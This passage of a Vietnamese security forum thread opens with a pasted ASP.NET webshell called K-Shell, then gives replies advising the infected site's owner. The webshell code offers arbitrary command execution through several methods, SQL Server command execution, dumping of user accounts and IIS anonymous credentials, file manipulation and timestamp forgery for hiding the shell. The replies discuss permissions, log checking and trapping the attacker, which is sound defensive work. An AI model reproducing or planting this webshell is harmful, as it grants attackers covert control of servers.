    <td><%=Session.SessionID%></td>
  </tr>
  <tr>
    <td colspan="2"><span class="style3">Client Infomation</span></td>
  </tr>
  <tr>
    <td>Client Proxy</td>
    <td><%=CP%></td>
  </tr>
  <tr>
    <td>Client IP</td>
    <td><%=CIP%></td>
  </tr>
  <tr>
    <td>User</td>
    <td><%=request.ServerVariables("HTTP_USER_AGENT")%></td>
  </tr>
</table>
<table align=center>
	<% Create_table_row_with_supplied_colors("Black", "White", "center", "Environment Variables, Server Variables") %>
	<tr>
		<td><textArea cols=50 rows=10><% output_all_environment_variables("text") %></textarea></td>
		<td><textArea cols=50 rows=10><% output_all_Server_variables("text") %></textarea></td>
	</tr>
</table>
<%
	case "cmd"
%>
<form runat="server">
  <p>[ CMD.NET for WebAdmin ]        <i><a href="javascript:history.back(1);">Back</a></i></p>
  <p> Execute command with ASP.NET account(<span class="style3">Notice: only click "Run" to run</span>)</p>
  <p>- This function has fixed by kikicoco.Antivirus has not detected (2007/02/27)-</p>
  Command:
  <asp:TextBox ID="cmd" runat="server" Width="300" class="TextBox" />
  <asp:Button ID="Button123" runat="server" Text="Run" OnClick="RunCMD" class="buttom"/>  
  <p>
   <asp:Label ID="result" runat="server" style="style2"/>      </p>
</form>
<%
	case "cmdw32"
%>
<form runat="server">
	<p>[ ASP.NET W32 Shell ]        <i><a href="javascript:history.back(1);">Back</a></i></p>
  	<p> Execute command with ASP.NET account using W32(<span class="style3">Notice: only click "Run" to run</span>)</p>
  	Command:
	<asp:TextBox ID="txtCommand1" runat="server" style="border: 1px solid #084B8E"/>
  	<asp:Button ID="Buttoncmdw32" runat="server" Text="Run" OnClick="RunCmdW32" style="color: #FFFFFF; border: 1px solid #084B8E; background-color: #719BC5"/>  
  	<p>
    <asp:Label ID="resultcmdw32" runat="server" style="color: #0000FF"/>      
    </p>
</form>
<%
	case "cmdwsh"
%>
<form runat="server">
	<p>[ ASP.NET WSH Shell ]        <i><a href="javascript:history.back(1);">Back</a></i></p>
  	<p> Execute command with ASP.NET account using WSH(<span class="style3">Notice: only click "Run" to run</span>)</p>
  	Command:
	<asp:TextBox ID="txtCommand2" runat="server" style="border: 1px solid #084B8E"/>
  	<asp:Button ID="Buttoncmdwsh" runat="server" Text="Run" OnClick="RunCmdWSH" style="color: #FFFFFF; border: 1px solid #084B8E; background-color: #719BC5"/>  
  	<p>
    <asp:Label ID="resultcmdwsh" runat="server" style="color: #0000FF"/>      
    </p>
</form>
<%
	case "pro"
%>
<form runat="server">
	<p align=center>[ List processes from server ]        <i><a href="javascript:history.back(1);">Back</a></i></p>
	<table align=center>
		<tr>
			<td>
			<% 
				Try
				output_wmi_function_data("Win32_Process","Name,ProcessId,HandleCount")
				Catch
				rw("This function is disabled by server")
				End Try
			%>
			</td>
		</tr>
	</table>
</form>
<%
	case "user"
%>
<form runat="server">
	<p align=center>[ List User Accounts ]        <i><a href="javascript:history.back(1);">Back</a></i></p>
	<table align=center>
		<tr>
			<td>
			<% 
				dim WMI_function = "Win32_UserAccount"		
				dim Fields_to_load = "Name,Domain,FullName,Description,SID"
				dim fail_description = " Access to " + WMI_function + " is protected"
				Try
				output_wmi_function_data(WMI_function,Fields_to_load)
				Catch
				rw(fail_description)
				End Try
			%>
			</td>
		</tr>
	</table>
</form>
<%
	case "applog"
%>
<form runat="server">
	<p align=center>[ List Application Event Log Entries ]        <i><a href="javascript:history.back(1);">Back</a></i></p>
	<table align=center>
		<tr>
			<td>
			<% 
				dim WMI_function = "Win32_NTLogEvent where Logfile='Application'"		
				dim Fields_to_load = "Logfile,Message,type"
				dim fail_description = " Access to " + WMI_function + " is protected"
				Try
				output_wmi_function_data_instances(WMI_function,Fields_to_load,2000)
				Catch
				rw(fail_description)
				End Try
			%>
			</td>
		</tr>
	</table>
</form>
<%
	case "syslog"
%>
<form runat="server">
	<p align=center>[ List System Event Log Entries ]        <i><a href="javascript:history.back(1);">Back</a></i></p>
	<table align=center>
		<tr>
			<td>
			<% 
				dim WMI_function = "Win32_NTLogEvent where Logfile='System'"		
				dim Fields_to_load = "Logfile,Message,type"
				dim fail_description = " Access to " + WMI_function + " is protected"
				
				Try
				output_wmi_function_data_instances(WMI_function,Fields_to_load,2000)
				Catch
				rw("This function is disabled by server")
				End Try
			%>
			</td>
		</tr>
	</table>
</form>
<%
	case "auser"
%>
<form runat="server">
	<p align=center>[ IIS List Anonymous' User details ]        <i><a href="javascript:history.back(1);">Back</a></i></p>
	<table align=center>
		<tr>
			<td>
			<% 
				Try
				IIS_list_Anon_Name_Pass
				Catch
				rw("This function is disabled by server")
				End Try
			%>
			</td>
		</tr>
	</table>
</form>
<%
	case "sqlrootkit"
%>
<form runat="server">
  <p>[ SqlRootKit.NET for WebAdmin ]        <i><a href="javascript:history.back(1);">Back</a></i></p>
  <p> Execute command with SQLServer account(<span class="style3">Notice: only click "Run" to run</span>)</p>
  <p>Host:
    <asp:TextBox ID="ip" runat="server" Width="300" class="TextBox" Text="127.0.0.1"/></p>
  <p>
  SQL Name:
    <asp:TextBox ID="SqlName" runat="server" Width="50" class="TextBox" Text='sa'/>
  SQL Password:
  <asp:TextBox ID="SqlPass" runat="server" Width="80" class="TextBox"/>
  </p>
  Command:
  <asp:TextBox ID="Sqlcmd" runat="server" Width="300" class="TextBox"/>
  <asp:Button ID="ButtonSQL" runat="server" Text="Run" OnClick="RunSQLCMD" class="buttom"/>  
  <p>
   <asp:Label ID="resultSQL" runat="server" style="style2"/>      </p>
</form>
<%
	case "del"
		dim a as string
		a=request.QueryString("src")
		call existdir(a)
		call del(a)  
		response.Write("<script>alert(""Delete " & replace(a,"\","\\") & " Success!"");location.href='"& request.ServerVariables("URL") & "?action=goto&src="& server.UrlEncode(Getparentdir(a)) &"'</script>")
	case "copy"
		call existdir(request.QueryString("src"))
		session("cutboard")="" & request.QueryString("src")
		response.Write("<script>alert('File info have add the cutboard, go to target directory click plaste!');location.href='JavaScript:self.close()';</script>")
	case "cut"
		call existdir(request.QueryString("src"))
		session("cutboard")="" & request.QueryString("src")
		response.Write("<script>alert('File info have add the cutboard, go to target directory click plaste!');location.href='JavaScript:self.close()';</script>")
	case "plaster"
		dim ow as integer
		if request.Form("OverWrite")<>"" then ow=1
		if request.Form("Cancel")<>"" then ow=2
		url=request.QueryString("src")
		call existdir(url)
		dim d as string
		d=session("cutboard")
		if left(d,1)="" then
			TEMP1=url & path.getfilename(mid(replace(d,"",""),1,len(replace(d,"",""))-1))
			TEMP2=url & replace(path.getfilename(d),"","")
			if right(d,1)="\" then   
				call xexistdir(TEMP1,ow)
				directory.move(replace(d,"",""),TEMP1 & "\")  
				response.Write("<script>alert('Cut  " & replace(replace(d,"",""),"\","\\") & "  to  " & replace(TEMP1 & "\","\","\\") & "  success!');location.href='"& request.ServerVariables("URL") & "?action=goto&src="& server.UrlEncode(url) &"'</script>")
			else
				call xexistdir(TEMP2,ow)
				file.move(replace(d,"",""),TEMP2)
				response.Write("<script>alert('Cut  " & replace(replace(d,"",""),"\","\\") & "  to  " & replace(TEMP2,"\","\\") & "  success!');location.href='"& request.ServerVariables("URL") & "?action=goto&src="& server.UrlEncode(url) &"'</script>")
			end if
		else
			TEMP1=url & path.getfilename(mid(replace(d,"",""),1,len(replace(d,"",""))-1))
			TEMP2=url & path.getfilename(replace(d,"",""))
			if right(d,1)="\" then 
				call xexistdir(TEMP1,ow)
				directory.createdirectory(TEMP1)
				call copydir(replace(d,"",""),TEMP1 & "\")
				response.Write("<script>alert('Copy  " & replace(replace(d,"",""),"\","\\") & "  to  " & replace(TEMP1 & "\","\","\\") & "  success!');location.href='"& request.ServerVariables("URL") & "?action=goto&src="& server.UrlEncode(url) &"'</script>")
			else
				call xexistdir(TEMP2,ow)
				file.copy(replace(d,"",""),TEMP2)
				response.Write("<script>alert('Copy  " & replace(replace(d,"",""),"\","\\") & "  to  " & replace(TEMP2,"\","\\") & "  success!');location.href='"& request.ServerVariables("URL") & "?action=goto&src="& server.UrlEncode(url) &"'</script>")
			end if
		end if
	case "upfile"
		url=request.QueryString("src")
%>
<form name="UpFileForm" enctype="multipart/form-data" method="post" action="?src=<%=server.UrlEncode(url)%>" runat="server"  onSubmit="return checkname();">
 You will upload file to this directory : <span class="style3"><%=url%></span><br>
 Please choose file from your computer :
 <input name="upfile" type="file" class="TextBox" id="UpFile" runat="server">
    <input type="submit" id="UpFileSubit" value="Upload" runat="server" onserverclick="UpLoad" class="buttom">
</form>
<a href="javascript:history.back(1);" style="color:#FF0000">Go Back </a>
<%
	case "new"
		url=request.QueryString("src")
%>
<form runat="server">
  <%=url%><br>
  Name:
  <asp:TextBox ID="NewName" TextMode="SingleLine" runat="server" class="TextBox"/>
  <br>
  <asp:RadioButton ID="NewFile" Text="File" runat="server" GroupName="New" Checked="true"/>
  <asp:RadioButton ID="NewDirectory" Text="Directory" runat="server"  GroupName="New"/> 
  <br>
  <asp:Button ID="NewButton" Text="Submit" runat="server" CssClass="buttom"  OnClick="NewFD"/>  
  <input name="Src" type="hidden" value="<%=url%>">
</form>
<a href="javascript:history.back(1);" style="color:#FF0000">Go Back</a>
<%
	case "edit"
		dim b as string
		b=request.QueryString("src")
		call existdir(b)
		dim myread as new streamreader(b,encoding.default)
		filepath.text=b
		content.text=myread.readtoend
%>
<form runat="server">
  <table width="80%"  border="1" align="center">
    <tr>      <td width="11%">Path</td>
      <td width="89%">
      <asp:TextBox CssClass="TextBox" ID="filepath" runat="server" Width="300"/>
      *</td>
    </tr>
    <tr>
      <td>Content</td> 
      <td> <asp:TextBox ID="content" Rows="25" Columns="100" TextMode="MultiLine" runat="server" CssClass="TextBox"/></td>
    </tr>
    <tr>
      <td></td>
      <td> <asp:Button ID="a" Text="Sumbit" runat="server" OnClick="Editor" CssClass="buttom"/>         
      </td>
    </tr>
  </table>
</form>
<a href="javascript:history.back(1);" style="color:#FF0000">Go Back</a>
<%
  		myread.close
	case "rename"
		url=request.QueryString("src")
		if request.Form("name")="" then
	%>
<form name="formRn" method="post" action="?action=rename&src=<%=server.UrlEncode(request.QueryString("src"))%>" onSubmit="return checkname();">
  <p>You will rename <span class="style3"><%=request.QueryString("src")%></span>to: <%=getparentdir(request.QueryString("src"))%>
    <input type="text" name="name" class="TextBox">
    <input type="submit" name="Submit3" value="Submit" class="buttom">
</p>
</form>
<a href="javascript:history.back(1);" style="color:#FF0000">Go Back</a>
<script language="javascript">
function checkname()
{
if(formRn.name.value==""){alert("You shall input filename :(");return false}
}
</script>
  <%
		else
			if Rename() then
				response.Write("<script>alert('Rename " & replace(url,"\","\\") & " to " & replace(Getparentdir(url) & request.Form("name"),"\","\\") & " Success!');location.href='"& request.ServerVariables("URL") & "?action=goto&src="& server.UrlEncode(Getparentdir(url)) &"'</script>")
			else
				response.Write("<script>alert('Exist the same name file , rename fail :(');location.href='"& request.ServerVariables("URL") & "?action=goto&src="& server.UrlEncode(Getparentdir(url)) &"'</script>")
			end if
		end if
	case "samename"
		url=request.QueryString("src")
%>
<form name="form1" method="post" action="?action=plaster&src=<%=server.UrlEncode(url)%>">
<p class="style3">Exist the same name file , can you overwrite ?(If you click " no" , it will auto add a number as prefix)</p>
  <input name="OverWrite" type="submit" id="OverWrite" value="Yes" class="buttom">
<input name="Cancel" type="submit" id="Cancel" value="No" class="buttom">
</form>
<a href="javascript:history.back(1);" style="color:#FF0000">Go Back</a>
   <%
    case "clonetime"
		time1.Text=request.QueryString("src")&"kshell.aspx"
		time2.Text=request.QueryString("src")
	%>
<form runat="server">
  <p>[CloneTime for WebAdmin]<i>      <a href="javascript:history.back(1);">Back</a></i> </p>
  <p>A tool that it copy the file or directory's time to another file or directory </p>
  <p>Rework File or Dir:
    <asp:TextBox CssClass="TextBox" ID="time1" runat="server" Width="300"/></p>
  <p>Copied File or Dir:     
    <asp:TextBox CssClass="TextBox" ID="time2" runat="server" Width="300"/></p>
<asp:Button ID="ButtonClone" Text="Submit" runat="server" CssClass="buttom" OnClick="CloneTime"/>
</form>
<p>
  <%
	case "logout"
   		session.Abandon()
		response.Write("<script>alert(' Goodbye !');location.href='" & request.ServerVariables("URL") & "';</sc" & "ript>")
	end select
end if
Catch error_x
	response.Write("<font color=""red"">Wrong: </font>"&error_x.Message)
End Try
%>
</p>
</p>
<hr>
<script language="javascript">
function closewindow()
{self.close();}
</script>
</body>
</html>
[Up] [Print Copy]
  [Question]   Re: Forum WWF 9.53 bị nhiễm K-SHELL, làm sao để fix 24/11/2008 14:33:10 (+0700) | #2 | 160041
[Avatar]
 BachDuongTM
Member
[Minus]    0    [Plus]
Joined: 29/06/2006 17:39:39
Messages: 85
Offline
[Profile] [PM] [Email]
Đây là 1 public .apsx webshell được công bố khá rộng rãi, tên K-shell chắc chỉ là sửa tên choi vui thôi.

Quay lại vấn đề chính, câu hỏi đặt ra là bạn muốn fix thế nào ?Nếu là delete file shell thì đơn giản, nhưng để bảo mật không bị tấn công lần nữa thì khó hơn. Ít nhất tại thời điểm hiện tại, bạn không biết vì sao shell được upload lên server và nó còn là cái thòng lọng treo đó .


Về kinh nghiệm server 2k3 mình có xíu chia sẻ :

1. đảm bảo code viết tốt nhất có thể, tốt về hoạt động, và tốt về bảo mật.
2. Hoàn thiện code ở local
3. Upload code lên thư mục web trên server và tiến hành phân quyền lại hợp lý
4. Thư mục code chỉ có quyền đọc với user site , hoặc thường là IIS guest .
5. Thư mục code có quyền đọc ghi với FTP user để có thể tiến hành chỉnh sửa lại code
6. Thư mục code có thêm 1 thư mục upload, thư mục này là thư mục đặc biệt, User site có quyền ghi và xóa trên đó, tuy nhiên IIS chỉ hoạt động ở chế độ no script với thư mục đó, tức là cho dù uload mã .aspx lên đó thì IIS chỉ đối xử như là một file text thường, thư mục này sẽ đựoc sử dụng để upload nội dung từ member.
7. Với mã .php thì chỉ ở trên là đủ để đảm bảo an toàn site nhưng mã aspx được hoạt động đưới một định danh riêng, mình từng kiểm chứng thấy ngang quyền system, vì thế đúng là họa vô đơn chí, add system deny edit lun thư mục code.Và hy vọng chính sách của mình không có lỗ hổng.

8. Cầu nguyện
smilie smilie smilie
[Up] [Print Copy]
  [Question]   Re: Forum WWF 9.53 bị nhiễm K-SHELL, làm sao để fix 25/11/2008 02:59:55 (+0700) | #3 | 160087
ktstbniit
Member
[Minus]    0    [Plus]
Joined: 03/01/2007 10:39:15
Messages: 5
Offline
[Profile] [PM] [WWW] [Yahoo!]
Website của mình thuê host của nhân hòa. Mình tìm trong cPanel thì chả thấy chỗ nào để cài đặt permision cả. phần code của WWF thì mình kiểm tra, 1 số module cho phép upload thì nó chặn, chỉ cho phép upload file ảnh, thử đổi cái file kia thành đuôi jpg thì cũng ko upload đc, Cái RTEditor thì mình cũng đã kiểm tra.

Các mục khác bạn nói thì khó quá, với cPanel ko làm đc thì phải. Nên mình đang dùng cách thứ 8 của bạn nếu.

Có cách khác thì giúp mình nữa nhé. Thanks
[Up] [Print Copy]
  [Question]   Re: Forum WWF 9.53 bị nhiễm K-SHELL, làm sao để fix 26/11/2008 05:04:37 (+0700) | #4 | 160254
[Avatar]
 azteam
Member
[Minus]    0    [Plus]
Joined: 17/03/2007 21:12:46
Messages: 177
Location: /dev/null
Offline
[Profile] [PM]
Ngoài các vấn đề BachDuongTM đề cập. Em cũng có một số ý kiến:
- Hiện tại nên backup source về check lại cẩn thận xem có gì khác không, check logfile web xem file đấy được upload lên host bằng cách nào?
- Nếu không nhầm thì Forum WWF chạy .asp, nếu chỉ chạy .asp thôi thì tốt nhất Website Extensions chỉ cho chạy asp, bỏ asp.net và php đi.
- Để chống k-shell thường từ các hosting provider(chạy .NET với trust level = medium, không cho overwrite webconfig, ...). nếu bạn không tự xử lý được tốt nhất nên liện hệ với hosting provider để cùng xử lý.
- Nếu dùng shared hosting thì vấn đề secu cho host rất khó khăn và không mấy khả thi.

smilie
[Up] [Print Copy]
  [Question]   Re: Forum WWF 9.53 bị nhiễm K-SHELL, làm sao để fix 26/11/2008 05:58:02 (+0700) | #5 | 160261
[Avatar]
 gamma95
Researcher
Joined: 20/05/2003 07:15:41
Messages: 1377
Location: aaa&quot;&gt;
Offline
[Profile] [PM] [ICQ]
@ktstbniit: Kshell nó là cái gì mà có thể "nhiễm" vào WWF nhỉ? Nhất là khi bạn post cái code lên đây làm gì? smilie ... Xem đoạn code lây lan của nó nằm ở đâu chắc ??
Nếu ko rõ bằng cách nào nó up con backdoor lên được thì hãy thử dùng cách này:

Thằng Hacker ko deface, mà để lại backdoor chắc nó còn quay lại. Hãy sửa lại con backdoor kshell một chút để bẫy nó (ghi lại IP, referer, etc) ra một file log bí mật (nếu có request truy vấn vào file này) và phá hỏng code của backdoor. Lúc đó backdoor ko còn tác dụng --> thằng hacker nhất định sẽ up lên con khác --> Lúc này bạn có đủ log (IP, referer, cookie ..etc) để truy vấn vào log xem nó làm sao để up được con backdoor đó. Có khi lại được vài kĩ năng của thằng hacker, hoặc là chôm được 0-day mà nó sử dụng để hack smilie.
[tán phét]
Tui đã từng bị một tay "có hạng" dùng chiêu này để truy vết smilie, may mà mình phát hiện ra cái bẫy của hắn và rốt cục cái bẫy của hắn chỉ bẫy được một lời khuyên của tui smilie
[/tán phét]
Cánh chym không mỏi
lol
[Up] [Print Copy]
  [Question]   Re: Forum WWF 9.53 bị nhiễm K-SHELL, làm sao để fix 27/11/2008 03:20:05 (+0700) | #6 | 160367
[Avatar]
 conmale
Administrator
Joined: 07/05/2004 23:43:15
Messages: 9353
Location: down under
Offline
[Profile] [PM]

gamma95 wrote:
@ktstbniit: Kshell nó là cái gì mà có thể "nhiễm" vào WWF nhỉ? Nhất là khi bạn post cái code lên đây làm gì? smilie ... Xem đoạn code lây lan của nó nằm ở đâu chắc ??
Nếu ko rõ bằng cách nào nó up con backdoor lên được thì hãy thử dùng cách này:

Thằng Hacker ko deface, mà để lại backdoor chắc nó còn quay lại. Hãy sửa lại con backdoor kshell một chút để bẫy nó (ghi lại IP, referer, etc) ra một file log bí mật (nếu có request truy vấn vào file này) và phá hỏng code của backdoor. Lúc đó backdoor ko còn tác dụng --> thằng hacker nhất định sẽ up lên con khác --> Lúc này bạn có đủ log (IP, referer, cookie ..etc) để truy vấn vào log xem nó làm sao để up được con backdoor đó. Có khi lại được vài kĩ năng của thằng hacker, hoặc là chôm được 0-day mà nó sử dụng để hack smilie.
[tán phét]
Tui đã từng bị một tay "có hạng" dùng chiêu này để truy vết smilie, may mà mình phát hiện ra cái bẫy của hắn và rốt cục cái bẫy của hắn chỉ bẫy được một lời khuyên của tui smilie
[/tán phét] 


Khì khì, thường mà bị tình trạng thế này là hoảng vía. Hầu hết là xóa béng ngay, thậm chí shutdown dịch vụ chớ có mấy ai bình tĩnh mà dùng chiêu "gậy ông" đâu em smilie . Anh thấy những con shell được dùng bằng cách lấy của ai đó rồi tìm cách upload lên server nào đó bị lỗi để... "quậy" thì thường cực kỳ hiếm 0-day.
What bringing us together is stronger than what pulling us apart.
[Up] [Print Copy]
[digg] [delicious] [google] [yahoo] [technorati] [reddit] [stumbleupon]
Go to: 
 Users currently in here 
1 Anonymous

Powered by JForum - Extended by HVAOnline
 hvaonline.net  |  hvaforum.net  |  hvazone.net  |  hvanews.net  |  vnhacker.org
1999 - 2013 © v2012|0504|218|